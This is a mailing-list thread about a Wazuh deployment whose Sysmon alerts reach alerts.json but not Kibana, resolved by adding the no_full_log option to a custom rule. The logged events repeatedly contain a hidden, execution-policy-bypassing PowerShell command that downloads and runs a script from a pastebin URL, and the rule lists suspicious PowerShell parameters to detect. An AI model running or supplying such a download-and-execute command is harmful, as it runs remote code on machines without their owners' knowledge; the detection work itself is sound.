Sysmon

[Miki Alkalay]

Hi Team,

I'm not getting any alert from sysmon.

the alert is coming to the alert.log and i can see it.

on the Gui no alert was showed up.

the rule is set for level 12.

Please advise

Miki

[Kevin Branch]

What version of Wazuh manager and agent are you using?

What version of Sysmon and ElasticStack are  you using?

Do you really see no events when querying for the following from the standard Kibana Discover window, using a broad enough time window?

data.win.system.providerName:"Microsoft-Windows-Sysmon"

Please send a redacted version of the JSON record of the level 12 sysmon alert you mentioned, from your alerts.json file.

Also, what was the rule's id number?  If it is a custom rule, please send the rule, too.

Kevin

--
You received this message because you are subscribed to the Google Groups "Wazuh mailing list" group.
To unsubscribe from this group and stop receiving emails from it, send an email to wazuh+un...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/wazuh/1730c6c2-2c0e-47f8-9c30-3c01e55c7aa6%40googlegroups.com.

[Miki Alkalay]

the local_rules is working on other Wazuh systems.

see my answer after your questions: 

What version of Wazuh manager and agent are you using? --> 3.9.5

What version of Sysmon and ElasticStack are  you using? --> sysmon version 10 and elastic it the same version as the installation guide for Wazuh 3.9.5

Do you really see no events when querying for the following from the standard Kibana Discover window, using a broad enough time window? 

data.win.system.providerName:"Microsoft-Windows-Sysmon" --> i don't understand.

Please send a redacted version of the JSON record of the level 12 sysmon alert you mentioned, from your alerts.json file.

decoder: 'json'
       win.system.providerName: 'Microsoft-Windows-Sysmon'
       win.system.providerGuid: '{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'
       win.system.eventID: '1'
       win.system.version: '5'
       win.system.level: '4'
       win.system.task: '1'
       win.system.opcode: '0'
       win.system.keywords: '0x8000000000000000'
       win.system.systemTime: '2019-09-19T18:08:32.840263000Z'
       win.system.eventRecordID: '1653125'
       win.system.processID: '6772'
       win.system.threadID: '4732'
       win.system.channel: 'Microsoft-Windows-Sysmon/Operational'
       win.system.computer: 'DESKTOP-DCNJEUR'
       win.system.severityValue: 'INFORMATION'
       win.system.message: 'Process Create:'
       win.eventdata.utcTime: '2019-09-19 18:08:32.821'
       win.eventdata.processGuid: '{EFEF7267-C420-5D83-0000-0010C57DE625}'
       win.eventdata.processId: '28552'
       win.eventdata.image: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       win.eventdata.fileVersion: '10.0.17134.1 (WinBuild.160101.0800)'
       win.eventdata.description: 'Windows PowerShell'
       win.eventdata.product: 'Microsoft® Windows® Operating System'
       win.eventdata.company: 'Microsoft Corporation'
       win.eventdata.originalFileName: 'PowerShell.EXE'
       win.eventdata.commandLine: '"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”'
       win.eventdata.currentDirectory: 'C:\Windows\system32\WindowsPowerShell\v1.0\'
       win.eventdata.user: 'DESKTOP-DCNJEUR\miki'
       win.eventdata.logonGuid: '{EFEF7267-F0B8-5D70-0000-0020EE380300}'
       win.eventdata.logonId: '0x338ee'
       win.eventdata.terminalSessionId: '1'
       win.eventdata.integrityLevel: 'Medium'
       win.eventdata.hashes: 'MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677'
       win.eventdata.parentProcessGuid: '{EFEF7267-F0B9-5D70-0000-00105F4A0500}'
       win.eventdata.parentProcessId: '5196'
       win.eventdata.parentImage: 'C:\Windows\explorer.exe'
       win.eventdata.parentCommandLine: 'C:\Windows\Explorer.EXE'

Also, what was the rule's id number?  If it is a custom rule, please send the rule, too.

<rule id="255016" level="12">
        <if_sid>255000</if_sid>
        <field name="win.eventdata.commandline">EncodedCommand||-w hidden||-window hidden||-windowstyle hidden||-enc||-noni||noninteractive||iex||Invoke-Expression||bypass||unrestricted||administrator||criptBlockLogging||ScriptBlockInvocationLogging||LogPipelineExecutionDetails||ProtectedEventLogging</field>
        <description>Detects suspicious PowerShell invocation command parameters: $(win.eventdata.commandline)</description>
    </rule>

To view this discussion on the web visit https://groups.google.com/d/msgid/wazuh/CA%2BdGL9G_pe7o2RJEkPRFMDAE-yr75zsvFmpffFazJWphoWqBCg%40mail.gmail.com.

--

Best Regards

Miki Alkalay

Mobile: 972-54-6496293

[Kevin Branch]

Hi Miki,

Related to my Kibana question, I was asking you to click on the Discover button on the upper left side of the Kibana window, somewhat below the "K" graphic.  

Make sure you are pointed at the wazuh-alerts-3.x-* index pattern with a time window set that is broad enough to catch sysmon events you know have occurred.

Then paste the following into the search field and hit the search button

data.win.system.providerName:"Microsoft-Windows-Sysmon"  

Do you see any Sysmon-related alerts in response to that?

The record you sent me looks like it came from the output of ossec-logtest, not directly from alerts.json.   Please send a redacted version of the actual JSON record of the sysmon alert you mentioned, that wazuh-manager wrote to /var/ossec/logs/alerts/alerts.json.  Only that will confirm that the alert was actually generated by the manager.  

Kevin

[Miki Alkalay]

tail -f  /var/ossec/logs/alerts/alerts.json | grep miki
{"timestamp":"2019-09-19T22:13:06.241+0300","rule":{"level":12,"description":"PowerShell scripts that download content from the Internet: \"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”","id":"255011","firedtimes":1,"mail":true,"groups":["sysmon"]},"agent":{"id":"044","name":"miki_Miki","ip":"10.0.0.9"},"manager":{"name":"wazuh"},"id":"1568920386.45711818","full_log":"{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2019-09-19T19:13:02.724049800Z\",\"eventRecordID\":\"1653596\",\"processID\":\"6772\",\"threadID\":\"4732\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-DCNJEUR\",\"severityValue\":\"INFORMATION\",\"message\":\"Process Create:\"},\"eventdata\":{\"utcTime\":\"2019-09-19 19:13:02.715\",\"processGuid\":\"{EFEF7267-D33E-5D83-0000-00108B3F3426}\",\"processId\":\"27740\",\"image\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"fileVersion\":\"10.0.17134.1 (WinBuild.160101.0800)\",\"description\":\"Windows PowerShell\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"PowerShell.EXE\",\"commandLine\":\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell.exe\\\" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”\",\"currentDirectory\":\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\\",\"user\":\"DESKTOP-DCNJEUR\\\\miki\",\"logonGuid\":\"{EFEF7267-F0B8-5D70-0000-0020EE380300}\",\"logonId\":\"0x338ee\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"Medium\",\"hashes\":\"MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677\",\"parentProcessGuid\":\"{EFEF7267-F0B9-5D70-0000-00105F4A0500}\",\"parentProcessId\":\"5196\",\"parentImage\":\"C:\\\\Windows\\\\explorer.exe\",\"parentCommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\"}}}","decoder":{"name":"windows_eventchannel"},"data":{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2019-09-19T19:13:02.724049800Z","eventRecordID":"1653596","processID":"6772","threadID":"4732","channel":"Microsoft-Windows-Sysmon/Operational","computer":"DESKTOP-DCNJEUR","severityValue":"INFORMATION","message":"Process Create:"},"eventdata":{"utcTime":"2019-09-19 19:13:02.715","processGuid":"{EFEF7267-D33E-5D83-0000-00108B3F3426}","processId":"27740","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","fileVersion":"10.0.17134.1 (WinBuild.160101.0800)","description":"Windows PowerShell","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"PowerShell.EXE","commandLine":"\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -w hidden -ep bypass -nop -c “IEX ((New-Object System.Net.Webclient).DownloadString(‘http://pastebin.com/raw/[REMOVED]’))”","currentDirectory":"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\","user":"DESKTOP-DCNJEUR\\miki","logonGuid":"{EFEF7267-F0B8-5D70-0000-0020EE380300}","logonId":"0x338ee","terminalSessionId":"1","integrityLevel":"Medium","hashes":"MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677","parentProcessGuid":"{EFEF7267-F0B9-5D70-0000-00105F4A0500}","parentProcessId":"5196","parentImage":"C:\\Windows\\explorer.exe","parentCommandLine":"C:\\Windows\\Explorer.EXE"}}},"location":"EventChannel"}
{"timestamp":"2019-09-19T22:13:09.224+0300","rule":{"level":5,"description":"Windows error event.","id":"18103","firedtimes":7,"mail":false,"groups":["windows","system_error"],"gpg13":["4.3"],"gdpr":["IV_35.7.d"]},"agent":{"id":"044","name":"miki_Miki","ip":"10.0.0.9"},"manager":{"name":"wazuh"},"id":"1568920389.45715698","full_log":"2019 Sep 19 22:13:03 WinEvtLog: Application: ERROR(1000): Application Error: (no user): no domain: DESKTOP-DCNJEUR: Faulting application name: PowerShell.exe, version: 10.0.17134.1, time stamp: 0x05e7290f  Faulting module name: bcryptPrimitives.dll, version: 10.0.17134.950, time stamp: 0xb13b6b13  Exception code: 0xc0000005  Fault offset: 0x000000000000d2b5  Faulting process id: 0x6c5c  Faulting application start time: 0x01d56f1e422b9c3b  Faulting application path: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe  Faulting module path: C:\\Windows\\System32\\bcryptPrimitives.dll  Report Id: 7aed6d89-80e8-431d-a540-6a68a5debf81  Faulting package full name: ?  Faulting package-relative application ID: ?  ","predecoder":{"program_name":"WinEvtLog","timestamp":"2019 Sep 19 22:13:03"},"decoder":{"parent":"windows","name":"windows"},"data":{"dstuser":"(no user)","id":"1000","status":"ERROR","data":"Application Error","system_name":"DESKTOP-DCNJEUR","type":"Application"},"location":"WinEvtLog"}

[Kevin Branch]

Hi Miki,

Thanks for the details.  So ossec-analysisd is definitely correctly matching rule 255016 and generating an alert that is written as a JSON record to /var/ossec/logs/alerts/alerts.json.  That is good.

I believe the problem is that your custom Sysmon rule has no "no_full_log" option set which at this time is needed to work around a Wazuh issue preventing alerts.json JSON record insertion into Elasticsearch when the full_log field consists of a JSON record of its own.

Please note that ANY local_rules file you include that involves JSON input, like Windows Eventstream events, must all have the "no_full_log" option set or the alert records for those rules will not actually be inserted into Elasticsearch.

Change your rule to look like this and then restart the wazuh-manager service:

<rule id="255016" level="12">
        <if_sid>255000</if_sid>
        <field name="win.eventdata.commandline">EncodedCommand||-w hidden||-window hidden||-windowstyle hidden||-enc||-noni||noninteractive||iex||Invoke-Expression||bypass||unrestricted||administrator||criptBlockLogging||ScriptBlockInvocationLogging||LogPipelineExecutionDetails||ProtectedEventLogging</field>
        <description>Detects suspicious PowerShell invocation command parameters: $(win.eventdata.commandline)</description>

        <options>no_full_log</options>

</rule>

See your expanded alert JSON record below presently contains a full_log field that itself contains a nested JSON record.  That is what must be stripped out via the no_full_log option at this time.  

{

Kevin Branch

Wazuh Trainer

[Miki Alkalay]

Hi,

It worked.

Thanks, so it wasn't in previous versions.

should i put on all rules the: <options>no_full_log</options>

Thanks

Miki

[Kevin Branch]

You are welcome, Miki.  To my knowledge, no_full_log is only needed on rules based on JSON input, with Windows event channel being the biggest example.  If you happen to consume JSON logs from Suricata or Snort, that would be another example of JSON input into Wazuh.

Also, I am under the impression this is a temporary situation and that eventually we'll be able to optionally store full_log JSON content without conflict.  I have not yet tried this with the new 3.10 though.

Kevin